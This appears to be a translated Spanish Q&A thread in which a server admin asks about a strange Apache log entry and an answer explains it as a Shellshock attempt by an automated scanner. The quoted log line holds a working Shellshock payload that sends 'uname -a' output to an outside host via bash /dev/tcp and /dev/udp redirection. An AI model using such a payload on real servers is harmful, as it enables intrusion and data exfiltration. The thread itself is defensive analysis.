Línea de registro de Apache extraño [duplicado]

3

Acabo de encontrar esta entrada en uno de mis servidores:

213.165.70.245 - - [17/Jun/2015:01:58:22 +0200] "GET / HTTP/1.1" 404 442 "() { :;}; /bin/bash -c \"echo 109.234.106.8/  > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo 109.234.106.8/ > /dev/udp/74.208.79.34/21\"" "() { :;}; /bin/bash
-c \"echo 109.234.106.8/  > /dev/tcp/74.208.79.34/21; /bin/uname -a > /dev/tcp/74.208.79.34/21; echo 109.234.106.8/ > /dev/udp/74.208.79.34/21\""

Además de la inyección de shell que se usó, no tengo una idea de lo que intentó hacer el atacante.

¿Alguna idea?

    
pregunta johestephan 17.06.2015 - 07:56
fuente

1 respuesta

3
  1. Como en la primera línea es visible, intentó usar el agujero de seguridad de shell bash.

Su idea fue probablemente la siguiente: Shellschock funciona con variables de entorno, es decir, en algunos casos, bash ejecutaría una variable de entorno como una función de shell. Y apache asigna los parámetros de las solicitudes http (cookies, cadenas de consulta, argumentos publicados, etc.) a las variables de entorno.

Si hubiera habido un script cgi en su servidor escrito en bash e interpretado por un shell bash no fijado, sus comandos podrían haberse ejecutado.

  1. Más tarde trató de ejecutar diferentes comandos de shell. Estos comandos enviaron su salida en el protocolo tcp o udp a un servidor bajo su control. Esto se debe a que bash tiene un mecanismo de redireccionamiento interno para las secuencias de datos tcp y udp, es decir, los archivos que comienzan con / dev / tcp / ip / port se asignan a los sockets de la red. Es un mecanismo interno del shell bash.

  2. Probablemente no fue un ataque directo, manual, sino un robot que rastrea a servidores vulnerables.

  3. Las direcciones IP que usó probablemente no son su servidor (es) original (es), sino las que ya puede controlar de forma remota.

respondido por el peterh 17.06.2015 - 08:30
fuente

Lea otras preguntas en las etiquetas